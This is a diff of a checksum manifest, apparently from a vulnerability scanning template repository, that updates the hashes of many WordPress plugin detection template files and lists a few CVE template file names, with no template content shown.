http/cves/2024/CVE-2024-3274.yaml:578789e5289c27456c8a66f9bde8d1160c615d34 http/cves/2024/CVE-2024-32964.yaml:f1b5908a6cd0bb367fea33497ae979a9bfae2966 http/cves/2024/CVE-2024-33113.yaml:64a8f2a506f72757a112f312214c4880021b99bb @@ -7841,236 +7841,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:1976e542a9e41f0e082a5fa5163fd6dc51c7dc3e +http/technologies/wordpress/plugins/add-to-any.yaml:94791317f6361114b7819d96e7f9f72ed304b98c +http/technologies/wordpress/plugins/admin-menu-editor.yaml:d7fb2bc74eff546ece2922ba4bde801db6e9f62c http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:45435a0d99fd9fe22f3830ca5e77fb717f21dd6b +http/technologies/wordpress/plugins/akismet.yaml:05990a07326dd4b0c9c156f94f715acbc82c0036 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:cfdebd358c33cd35f0b0fdcae37fe30b1f61536a +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:077521a26973024357d7b7c64cd2270c3173aba4 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:eb9baf45132470c022558e474a6ab926a1377626 +http/technologies/wordpress/plugins/amp.yaml:9837999c46aa9ff4d89f84c29acd521aeca0c027 +http/technologies/wordpress/plugins/antispam-bee.yaml:f5fea9de6297a097f864763a50ac3c99c3facbef +http/technologies/wordpress/plugins/astra-sites.yaml:adb9d8dd4bd39db63de471e02aa9fb4333c718e1 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/autoptimize.yaml:7e62ba1f8adaf5eca7e51a7fa5070279e8b30315 +http/technologies/wordpress/plugins/backwpup.yaml:13cbf32e2480c3114c5af3e4f5193b278de421fd +http/technologies/wordpress/plugins/better-search-replace.yaml:0c802f90a5bb0e06a717c36e897bc5e260121509 +http/technologies/wordpress/plugins/better-wp-security.yaml:0662aa698c95375c581a8da03f0ac5a9b0da3321 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4bcade4222e56540dfb1c3726c02988d6b1f7e8d +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:33cb261c829479ea635464d59b9eedb4b81c22a0 +http/technologies/wordpress/plugins/breeze.yaml:1ed20fd45d53bd705682e2281e7d751b9f025bc7 +http/technologies/wordpress/plugins/broken-link-checker.yaml:b18a21e88eb26adb0fddb3fffb91dcbac2167f4c http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/chaty.yaml:afb7f1a381f911a939300279c14474ddda5fe68e +http/technologies/wordpress/plugins/child-theme-configurator.yaml:010494319d2f2eabb558ca234c2d8c92f1b5edea +http/technologies/wordpress/plugins/classic-editor.yaml:9a6bddd9717824da3f89ae06f469a5a467e9d026 +http/technologies/wordpress/plugins/classic-widgets.yaml:8c701e1a6697236a6af5c33d540e6ef2504e69c2 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:66530f8932f8eb946e5c0120b5cea356bdc8eb19 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:707a544fc53a6d16bf19072e1d4e597beeebc4bd +http/technologies/wordpress/plugins/coblocks.yaml:bbf2254bb35ddbd0e195de149fc83929d70d2dd2 +http/technologies/wordpress/plugins/code-snippets.yaml:3baadcc309b9d626454bca269483b8d98a42fb3d +http/technologies/wordpress/plugins/coming-soon.yaml:02f3bd3e9e365ab3aaabff01cd28e8d6c3a48c67 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:6549c9482d8f414ba60bf4b281b70fc2441a433d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:1ee215f48352bac5651574b4f2d02d8b95b635a8 +http/technologies/wordpress/plugins/contact-form-7.yaml:aa7af42e721a59e04f16af14c8e9765f2a03b838 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:2f2c27d414a0c7a2ff6589a1a9c24fcd3e8f0935 +http/technologies/wordpress/plugins/cookie-law-info.yaml:196e9c44ca934fc4c1f885318a84c5b34bfb9408 +http/technologies/wordpress/plugins/cookie-notice.yaml:66c2286b38d1c06916a6577ee8bf21741c94dcf6 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:1ed2dce002b43628a9beaff63f799a5bbac9af14 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:637ad468e2b1f602d4ac8d8684a02d9db4d579d6 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d8a893f9695af7d4252fda00f8de766676e99797 +http/technologies/wordpress/plugins/custom-css-js.yaml:965fdd1dd61f58520b54dd5d5819eadaa973da06 +http/technologies/wordpress/plugins/custom-fonts.yaml:51e9a8c5e773acaaac062d3ec07de7d4668dd067 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:747eeab480130708b7b76c2bd1ce52579aa7c9f4 +http/technologies/wordpress/plugins/disable-comments.yaml:9f6779484633a739c1a34d25e933ac67276ca47a +http/technologies/wordpress/plugins/disable-gutenberg.yaml:eee45c9f4ab2d9308d07276a1157fef4543a77ff +http/technologies/wordpress/plugins/duplicate-page.yaml:4372962a2796b059b6c3a2697d40c15100d4d07f +http/technologies/wordpress/plugins/duplicate-post.yaml:be523de22923128b0f4d167106e32965f560bed2 +http/technologies/wordpress/plugins/duplicator.yaml:61bb48d05060f9e76f4ab6ea7e89e881ef417257 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:e26f5fcf9df21741d6c4d9c775cf5457e5839be9 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:022f518e7d49f749cbf45a0e81c4bcdc60f7e758 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/extendify.yaml:16df61d6c1c08c47ee240cf33df07fd008bc0a27 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:2e8ae9cb3babce12115d710e00ce58acc13e3ee2 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:ce6ed3aca6ed79ee0bbb78541294a0afd7484c13 +http/technologies/wordpress/plugins/elementor.yaml:d189910f53171d9197d53b6f72629880148cea89 +http/technologies/wordpress/plugins/elementskit-lite.yaml:1389b7c8ff234410a39812c87c2b8bd5e5c894a6 +http/technologies/wordpress/plugins/enable-media-replace.yaml:f03ee237e750bdffc574d3d15629625fb6b490d1 +http/technologies/wordpress/plugins/envato-elements.yaml:32f87a32ccc0f1163cab2f7f18bb9304431d407a +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:b1cfdbe9b08d70144609cbd36d6cd99aa6a9cea8 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:03b6caa25ea07cb0d9b799d4e58c7e14bb6e2af4 +http/technologies/wordpress/plugins/extendify.yaml:402285e0bbd8d6b303500806b54a422dd6fcb94c +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:246bec694ac0ea0f730e0723c59108ec5a835537 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:92ec1f76e8999dfbef4bd1577df62f722fe42a4a http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:782875011c940e8bfc6f8adae8fa40d0387f6fd8 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/flamingo.yaml:c6b6c878b7f2b685c460040d6d5aa1e87a76e7f1 +http/technologies/wordpress/plugins/fluent-smtp.yaml:34d414379694a4f2b1e0486a4933c6966c57cb5b +http/technologies/wordpress/plugins/fluentform.yaml:2f08ba3db943c08bd744932a290eec38aef5f3fd +http/technologies/wordpress/plugins/font-awesome.yaml:8ac46f6e053bea5592efccd2b542613b7f325b8e +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:19fc997bdd4ff27085db0ca47f83f4e828d56375 +http/technologies/wordpress/plugins/formidable.yaml:c13a61770b1d6c266be89e08f6554c40706c7f79 +http/technologies/wordpress/plugins/forminator.yaml:453ba2b8b71f342c0f2c336aa0373a957aef92b8 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:39c530d561b9bf6e4faa2d63319f9d697cdc5650 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:94c19fbaced80d7171a77b228a2355a8f4b23178 http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:2ce79134ffd98a0c7bb988b09009dc18a4677a90 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:fb285e91ec035cf01097705bd96c5ae95832d7e2 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:382d905766796f2517c9acd89e9e14f9283f0234 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:e4767f67155236ce903ed429381c3ac6fb5a4f08 +http/technologies/wordpress/plugins/google-site-kit.yaml:b345f71366a8e5f4c658087ff7a2458d4bb7e09a +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:ac44e64c8e11a673d580da9a426afe75b224e965 +http/technologies/wordpress/plugins/gtranslate.yaml:42193af95ea0b9ce006f90299d0381fc07ddb1e9 +http/technologies/wordpress/plugins/gutenberg.yaml:ef56a84904f9a0cab4c67c7e434b1c596b396f21 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:642f1f09dc2d41ab0be7a880924a18d9f8ca41bd http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:1c6be6bc344e532324a2ddd3909f1a894db83bd8 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:2f8c79e9f8af30c6a80b5eec40e34c86a8990b5c +http/technologies/wordpress/plugins/header-footer-elementor.yaml:de82f5ad0a79a6c41e42ee81916cb1a2be9e5679 +http/technologies/wordpress/plugins/header-footer.yaml:bf84b3a41cbcd0a1e4fcad6921cad831a8b35ac0 +http/technologies/wordpress/plugins/health-check.yaml:5e9c9855c6ac8c905bd4e2895136d87cf47aa823 +http/technologies/wordpress/plugins/hello-dolly.yaml:e8bf8d8217801d8443d8add37c765c951f851f20 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:6764ff2048d3ff252d7829bee0468de8fd1d2ef5 +http/technologies/wordpress/plugins/hostinger.yaml:777e386bed26e6b9b3bf2e76b239b8cb760b3531 +http/technologies/wordpress/plugins/image-optimization.yaml:2777af313c8066dc5310403e542a22751a64afe4 +http/technologies/wordpress/plugins/imagify.yaml:37e5001c32bfbd84ad7c7ea7731a854b684a1bae http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:ba42b7a8d9beda9329606f58501295625aa9dcc9 +http/technologies/wordpress/plugins/instagram-feed.yaml:a30badc9299a4b6055091d60a6aa9b4ec9b1b228 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a91e62727b9b7ae080a5e4b6640fdce34a1be588 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:7cfe45f9202488fec2a3f4dc699e48f9159838f8 +http/technologies/wordpress/plugins/jetpack.yaml:0c8b3f7d0b6d445ee82492f92a559047516f6b63 +http/technologies/wordpress/plugins/kadence-blocks.yaml:f42424a57956e746c1945f60dac20e166d5310d0 +http/technologies/wordpress/plugins/kirki.yaml:8cc0ff791c4129719f4a30c13af0b767a1a67f62 +http/technologies/wordpress/plugins/leadin.yaml:61e8add9093eb0795b001c37dd864e75fb55ad3c +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:2ea1e8f77189fea80072172d716234172270bbf2 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:0fa6d4198d217a5e1b28788f971f1739c50a528e +http/technologies/wordpress/plugins/litespeed-cache.yaml:411279e4481d3dd37c34a24837ce3344683d3e82 +http/technologies/wordpress/plugins/loco-translate.yaml:578755e4b37933101a3f70f0a9e081c884332942 +http/technologies/wordpress/plugins/loginizer.yaml:2f55f4998c825bb01a9cc6469901278f75484959 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:c274f39e569adf0c41b69c94e3e3d6cf50b43817 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:2fb6e282504f3ab516bf8dda5fa84624bec49aea -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:e805aa0f24118a419ba698e01f4040c3e021358d -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:721b9487cbc30a776670e8971f8a72c981792649 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:5b35d8e2f5174ea943a79f33b5d9efc7eaac3749 +http/technologies/wordpress/plugins/mailpoet.yaml:e03d43d922bc893c90b866efac6b05d6425e7c60 +http/technologies/wordpress/plugins/maintenance.yaml:d0892e9a0decfa5cb2f167d6c42ff51cc1da20c5 +http/technologies/wordpress/plugins/mainwp-child.yaml:7e02e159763b29152cc7c32b011c5d08fd856a91 +http/technologies/wordpress/plugins/malcare-security.yaml:2d4756e312a3243f38cd81829abafc20308fd9d4 +http/technologies/wordpress/plugins/megamenu.yaml:8c9a81f868623679f24cf4c5f50a258cdc820c77 +http/technologies/wordpress/plugins/members.yaml:6f64d7f2e81285344fed52d0f48f90d135193963 +http/technologies/wordpress/plugins/meta-box.yaml:6da08e6c5b90756a462d7730dd1602749f4de8e8 +http/technologies/wordpress/plugins/metform.yaml:1bc8104cb9d0394fe32d41eec60cd208ef2ee32d +http/technologies/wordpress/plugins/ml-slider.yaml:ae3a4c25cb64137ba9fabcfef87ebabc47ca4258 +http/technologies/wordpress/plugins/newsletter.yaml:38ef8b3f5257346c8b819933f01e60103723a980 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:04380ffb8a3cec3f50c1183a8cb6ea6b9c17a4d5 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:db45476ae4354690fef82e11efeb91001051cb67 +http/technologies/wordpress/plugins/ninja-forms.yaml:a51762fa4643f17527d2fa5fc9fc6533754c258c +http/technologies/wordpress/plugins/ocean-extra.yaml:1c53b0b5455b5cf41fc6aedba48d70f49b63664e +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:6a717267353d94ceb97a443de95cddef59a6603a +http/technologies/wordpress/plugins/one-click-demo-import.yaml:739fb043e62c7d1fb1484d5be83ab0d388ebbe02 +http/technologies/wordpress/plugins/optinmonster.yaml:0c7f75e0111eefd1eae1ef4a9850d44e910fc173 +http/technologies/wordpress/plugins/otter-blocks.yaml:9457271043c2ce42884ee96b9af2eb45aaceca65 +http/technologies/wordpress/plugins/password-protected.yaml:8a360d25b319a5135313e73f2c5537255868ff2e +http/technologies/wordpress/plugins/pdf-embedder.yaml:d18eae5f1cfe37eba5b8ca186452b1d0b17ee9c0 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:64efbae172550ad4d2f7ec23be3affaf497165bc +http/technologies/wordpress/plugins/pixelyoursite.yaml:53e895d387f3ec98b9dc16613f9ee6ae82341c01 +http/technologies/wordpress/plugins/polylang.yaml:7f44f1e08fd470c6cc421e30cc2577d31669f818 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:020ac98ee8b37e204e0935108f9d69e52db78397 